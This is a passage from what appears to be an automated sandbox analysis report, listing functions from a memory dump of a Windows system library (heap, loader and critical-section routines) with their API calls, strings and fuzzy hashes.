                                                                                                                            • RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,000000FF,000000FE,00000006,?,0000000C,00000000,6B2217F0,00000000), ref: 6B1EDEE8
                                                                                                                            • RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,00000001,?,00000000,00000000,?,000000FF,000000FE,00000006,?,0000000C,00000000), ref: 6B1EDF0D
                                                                                                                            • RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,00000000,00000001,?,00000000,00000000,?,00000001,?,00000000,00000000,?,000000FF), ref: 6B1EDF46
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HeaderImage$AcquireLockMemoryQuerySharedVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 114269737-0
                                                                                                                            • Opcode ID: e0f983c6260b1643dbc30455319f05cd87d0e328e016b2fbca2634bcb7185147
                                                                                                                            • Instruction ID: c0726fa3cfa7d9a0b771424ccb2fae691312880974b4fea5d259ce6f113d5b68
                                                                                                                            • Opcode Fuzzy Hash: e0f983c6260b1643dbc30455319f05cd87d0e328e016b2fbca2634bcb7185147
                                                                                                                            • Instruction Fuzzy Hash: D1C1F771F00A0A9FDB14CF58C884BAEB7F2EF94714F1485ADD5259B281D738E942CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B293518, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,00000000,?,?,6B22FC67), ref: 6B29354D
                                                                                                                            • DbgPrint.1105(HEAP: ,00000000,?,?,6B22FC67), ref: 6B29355A
                                                                                                                            • DbgPrint.1105(May not destroy the process heap at %p,?,00000000,?,?,6B22FC67), ref: 6B293566
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                                                                                            • API String ID: 3558298466-4256168463
                                                                                                                            • Opcode ID: cf9658b5b70e84113f8dfda5493c1c258f423337229ce6de7a713cd5090985d1
                                                                                                                            • Instruction ID: 70e74f7182b1b5478c740bd7cc64cfa8c3fde0dbc423d8799ad7be17931f8527
                                                                                                                            • Opcode Fuzzy Hash: cf9658b5b70e84113f8dfda5493c1c258f423337229ce6de7a713cd5090985d1
                                                                                                                            • Instruction Fuzzy Hash: 8201D636120209EFCB21EF79E485F96B3E9FB4D618F008495E41E9B281DB3DE944C661
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B26FF10, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p,?,000000FF,?,6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000,?,6B1D1E03,?), ref: 6B26FF69
                                                                                                                            • RtlDecodePointer.1105(6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000,?,6B1D1E03,?,6B1D1D6E,?), ref: 6B26FF78
                                                                                                                            • RtlRaiseStatus.1105(C0000264,6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000,?,6B1D1E03,?,6B1D1D6E,?), ref: 6B26FF89
                                                                                                                            • RtlDebugPrintTimes.1105(?,C0000264,6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000,?,6B1D1E03,?,6B1D1D6E,?), ref: 6B26FF9A
                                                                                                                            • RtlpNotOwnerCriticalSection.1105 ref: 6B26FFB1
                                                                                                                            Strings
                                                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 6B26FF60
                                                                                                                            • PS,k?, xrefs: 6B26FF56, 6B26FF5C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$CriticalDebugDecodeOwnerPointerRaiseRtlpSectionStatusTimes
                                                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p$PS,k?
                                                                                                                            • API String ID: 2675442896-842517642
                                                                                                                            • Opcode ID: b7d104972db1cf33d626ffd269d9e77216f5e6baff013d01222015d84bdcef2e
                                                                                                                            • Instruction ID: 0bda474e1f5b2e0bce350c00607358c481dca710a6fcbe5a4900a357414c6169
                                                                                                                            • Opcode Fuzzy Hash: b7d104972db1cf33d626ffd269d9e77216f5e6baff013d01222015d84bdcef2e
                                                                                                                            • Instruction Fuzzy Hash: 10118E7195014CEFDF02DB60C9C9B99B7F1BF05789F108094E1089B5A1D73D9980CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DC600, Relevance: 12.2, APIs: 8, Instructions: 225memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeStringEx.1105(?,?,?,?,?), ref: 6B1DC639
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,?,00000400,?,?,?,?,?,?), ref: 6B1DC665
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000002,?,?,00000002,00000000,?,?,?,?), ref: 6B247A15
                                                                                                                            • RtlAllocateHeap.1105(?,?,?,?,?,?,?,?), ref: 6B247A43
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,00000000,?,?,?,?), ref: 6B247A65
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,00000002,00000000,?,?,?,?), ref: 6B247A8A
                                                                                                                            • RtlUnicodeStringToInteger.1105(?,00000000,00000000,?,?,00000002,00000000,?,?,?,?), ref: 6B247B52
                                                                                                                            • memcpy.1105(00000000,0000000C,?,?,?,00000002,00000000,?,?,?,?), ref: 6B247BB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeQueryStringUnicodeValue$AllocateInitIntegermemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3015855070-0
                                                                                                                            • Opcode ID: 4e1802c20dea8caf51f6e5cb6fd2a29d8992ee0f9f35dad9b03ce24e729603dc
                                                                                                                            • Instruction ID: 2b881fe4c5c5b565b85f9adfa6f0237eaaa7f76e75e6154453288b87cf9f0ee1
                                                                                                                            • Opcode Fuzzy Hash: 4e1802c20dea8caf51f6e5cb6fd2a29d8992ee0f9f35dad9b03ce24e729603dc
                                                                                                                            • Instruction Fuzzy Hash: 8181E471A4824A9BDB19CE14C8C0F6BB3E4FF84754F14485AED648BBA4D338DD45CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D5050, Relevance: 12.1, APIs: 8, Instructions: 133memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?), ref: 6B1D5096
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,?), ref: 6B230C80
                                                                                                                              • Part of subcall function 6B1F6E30: memset.1105(01000000,00000000,?,?,00000024,00000000,?), ref: 6B1F6F17
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6B1D5128
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C79A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6B1D5136
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000,?), ref: 6B1D5164
                                                                                                                            • ZwClose.1105(?,6B2C79A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000,00000000,00000000,00000000), ref: 6B1D5179
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,6B2C79A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00000000,00000000), ref: 6B1D518A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,00000000,00000000,?,00000000,?), ref: 6B230C3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Free$CriticalSection$AllocateCloseEnterLeavememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1968905909-0
                                                                                                                            • Opcode ID: 9c57f4b3fc17bf818b78b6dfed161f92c96f91e62303db5e52a861e64fbae131
                                                                                                                            • Instruction ID: 3fb4efd58ec886dfc518d20b4e35d5820e4b1897b9b9bd6d1661cf917d0a495c
                                                                                                                            • Opcode Fuzzy Hash: 9c57f4b3fc17bf818b78b6dfed161f92c96f91e62303db5e52a861e64fbae131
                                                                                                                            • Instruction Fuzzy Hash: D341F376648312ABD310DF28C880B6BB7E4EF44B14F050E2AF9959B290E738DC42C7E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20513A, Relevance: 10.8, APIs: 7, Instructions: 258timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,-00000054,6B2C86CC,?,000000FF,?,000000A0,?), ref: 6B205234
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446177414-0
                                                                                                                            • Opcode ID: 65e17fd8fa9a1ff10ad982af36b4e2afaac30486c1ffa246b622d3d346b6e9a9
                                                                                                                            • Instruction ID: fef7c6685ee8e5d2a855191eb80d7dc8a88c5e54fa517a3554397d3fb2c0df3e
                                                                                                                            • Opcode Fuzzy Hash: 65e17fd8fa9a1ff10ad982af36b4e2afaac30486c1ffa246b622d3d346b6e9a9
                                                                                                                            • Instruction Fuzzy Hash: 7AC121756083858FD355CF28C5C0A5AFBE1BF88308F144AAEF9998B392D775E845CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28D4E1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,00000000,00000001,00000000,?,?,00000000,00000000,6B1E71B4,6B1E71B4,?,C000000D,?,?,?,?), ref: 6B28D699
                                                                                                                            • RtlCultureNameToLCID.1105(?,6B1E71B4,?,00000000,00000001,00000000,?,?,00000000,00000000,6B1E71B4,6B1E71B4,?,C000000D,?,?), ref: 6B28D6A6
                                                                                                                            • RtlLCIDToCultureName.1105(6B1E71B4,?,00000001,00000000,?), ref: 6B28D6ED
                                                                                                                            • _wcsicmp.1105(00000000,00000000,6B1E71B4,?,00000001,00000000,?), ref: 6B28D729
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000001,00000000,?,?,00000000,00000000,6B1E71B4,6B1E71B4,?,C000000D,?,?,?), ref: 6B28D751
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CultureName$FreeHeapInitStringUnicode_wcsicmp
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 3981842732-1339004836
                                                                                                                            • Opcode ID: e4190bdba769db170bdf03e4438b82029291753f772159210f9cf24315aaed2f
                                                                                                                            • Instruction ID: 5ffd3076c7da7f46f471e18b26c833ba797befb5e5e318ff01eec490b9b833fb
                                                                                                                            • Opcode Fuzzy Hash: e4190bdba769db170bdf03e4438b82029291753f772159210f9cf24315aaed2f
                                                                                                                            • Instruction Fuzzy Hash: 1B718D35A8061E9BDB14CE64C4C0AAEB7F9AF05795F95419FDC20AB2C0E73CD94D8B90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DE8B0, Relevance: 10.7, APIs: 7, Instructions: 190memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,C000000D,00000000,0000EEEE,?,?,6B28D3A0,00000000,00000FFF,00000000,?,6B239578,00000000), ref: 6B23568A
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,C000000D,00000000,0000EEEE,?,?,6B28D3A0,00000000,00000FFF,00000000,?,6B239578,00000000), ref: 6B2356A9
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,C000000D,00000000,0000EEEE,?,?,6B28D3A0,00000000,00000FFF,00000000,?,6B239578,00000000), ref: 6B2356C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: 332dd7b6427a2ff37b2958637256c2ea3595f6bb166278ecb2218a35508bbaf5
                                                                                                                            • Instruction ID: 54a42a5af5d7fe07809c8c21fb6853681642986371ab1d044f44e785c15442e2
                                                                                                                            • Opcode Fuzzy Hash: 332dd7b6427a2ff37b2958637256c2ea3595f6bb166278ecb2218a35508bbaf5
                                                                                                                            • Instruction Fuzzy Hash: C571BFB2965B46EBDB218E29CA80B12F7F1BF45727F100B5DDAD5029E1D73CA581CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FB73D, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-1334570610
                                                                                                                            • Opcode ID: 0a85851c045fbd104453d8afed6434103bb50cadba12cf36c6956cf8e6af0f5b
                                                                                                                            • Instruction ID: cf2083bf7a1df0ffcd9a424ec9be20a69d164b8896c51d9b51cc35977aa84df6
                                                                                                                            • Opcode Fuzzy Hash: 0a85851c045fbd104453d8afed6434103bb50cadba12cf36c6956cf8e6af0f5b
                                                                                                                            • Instruction Fuzzy Hash: 1761C170A00205EFDB18CF28C485B6BBBE9FF45704F25859DE8498B285D738E882CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2095EC, Relevance: 10.7, APIs: 7, Instructions: 165timelibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000000,00000001,?,?,7FFE0386), ref: 6B2096A5
                                                                                                                              • Part of subcall function 6B209702: RtlAcquireSRWLockExclusive.1105(?,?,?,?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B20974F
                                                                                                                              • Part of subcall function 6B209702: RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B20976D
                                                                                                                            • LdrLockLoaderLock.1105(00000000,00000000,00000001,?,?,7FFE0386,?,6B1D6778,00000001), ref: 6B249682
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B24972B
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6B249740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Lock$DebugExclusivePrintTimes$AcquireCurrentLoaderReleaseServiceSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 732933571-0
                                                                                                                            • Opcode ID: 5bc04f8f94256f80864f160f48efb11a40df391077912a46be077ae63368aab8
                                                                                                                            • Instruction ID: 911408a02d9c47ae42a9dcf2d3aeca56fcb130cc90de4ca079c2b7220b584cc0
                                                                                                                            • Opcode Fuzzy Hash: 5bc04f8f94256f80864f160f48efb11a40df391077912a46be077ae63368aab8
                                                                                                                            • Instruction Fuzzy Hash: 1251DC70E5460EAFCB09CF68C988BAEB7F4BF49715F004169E416976A1DB7C9921CB80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E99C7, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1E9A0C
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1E9BFE
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B239FFA
                                                                                                                            Strings
                                                                                                                            • LdrResFallbackLangList Enter, xrefs: 6B1E99F2
                                                                                                                            • LdrResFallbackLangList Exit, xrefs: 6B1E9A04
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession
                                                                                                                            • String ID: LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                            • API String ID: 1007659313-1720564570
                                                                                                                            • Opcode ID: 5cdb278590bfed039710b06a136540d3fa0480907bd05f880d384376bf2aa18a
                                                                                                                            • Instruction ID: 805433a910a6402b113c2219b78b347791b3283592258d7c454e9b1f624edff7
                                                                                                                            • Opcode Fuzzy Hash: 5cdb278590bfed039710b06a136540d3fa0480907bd05f880d384376bf2aa18a
                                                                                                                            • Instruction Fuzzy Hash: C151E371608796DBD710CF28C490B5AB7E4FF86B84F0484AAE954CB392E739C881C766
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28D208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,PreferredUILanguages,00000000,?,?), ref: 6B28D24B
                                                                                                                              • Part of subcall function 6B1DF018: RtlAllocateHeap.1105(?,00000008,?,?,00000000,?), ref: 6B1DF05B
                                                                                                                              • Part of subcall function 6B1DF018: ZwQueryValueKey.1105(?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF07A
                                                                                                                              • Part of subcall function 6B1DF018: memcpy.1105(00000000,0000000C,?,?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF0AB
                                                                                                                              • Part of subcall function 6B1DF018: RtlFreeHeap.1105(?,00000000,00000000,?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF0CB
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000000,?,00000000,00000000,?,?,PreferredUILanguages,00000000,?,?), ref: 6B28D286
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,?,?), ref: 6B28D361
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateFree$InitQueryStringUnicodeValuememcpy
                                                                                                                            • String ID: PreferredUILanguages
                                                                                                                            • API String ID: 4141005267-1884656846
                                                                                                                            • Opcode ID: 16a848aec28757e115d17abd655257d9f7a430e536bd357c282d203a2a204cfa
                                                                                                                            • Instruction ID: f7df548d17a41e5757fd2275b43703ff4a4e3273e2ee939e35b1ae34e7363c95
                                                                                                                            • Opcode Fuzzy Hash: 16a848aec28757e115d17abd655257d9f7a430e536bd357c282d203a2a204cfa
                                                                                                                            • Instruction Fuzzy Hash: 7C41B436D4051DABDB11CAA5C880AEE73F9AF44790F0041ABE911AB290D738DE0CCBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D3FC5, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 131COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,6B293933,RtlGetUserInfoHeap), ref: 6B2303D9
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,6B293933,RtlGetUserInfoHeap), ref: 6B2303E6
                                                                                                                            • DbgPrint.1105(Invalid address specified to %s( %p, %p ),?,?,?,?,?,?,?,6B293933,RtlGetUserInfoHeap), ref: 6B2303F9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                            • API String ID: 3558298466-1151232445
                                                                                                                            • Opcode ID: cc5033ef0b25acd43334d7c38a050ef44ce4d44e9e9782cd58a61d0d6ed8b674
                                                                                                                            • Instruction ID: 9213dbaa6f379929ed2084f9ef55d9af6320b712b217df04929f22c77deb0a1c
                                                                                                                            • Opcode Fuzzy Hash: cc5033ef0b25acd43334d7c38a050ef44ce4d44e9e9782cd58a61d0d6ed8b674
                                                                                                                            • Instruction Fuzzy Hash: C6411370604355EBEB15CB28C4C5BAB77E0DF02709F1449A9D5958B682C72ED485C727
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20CE6C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 131memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,?,00000040,00000000,?,?,00000000,00000002), ref: 6B20CEE6
                                                                                                                            • memcpy.1105(00000010,?,00000000,?,00000000,?,00000040,00000000,?,?,00000000,00000002), ref: 6B20CF16
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand,RtlpInsertAssemblyStorageMapEntry,00000040,?,00000000,00000000,00000000,00000002,?,00000040,00000000,?,?,00000000), ref: 6B24AE15
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000040,00000000,?,?,00000000,00000002), ref: 6B24AE34
                                                                                                                            Strings
                                                                                                                            • RtlpInsertAssemblyStorageMapEntry, xrefs: 6B24AE07
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 6B24AE0C
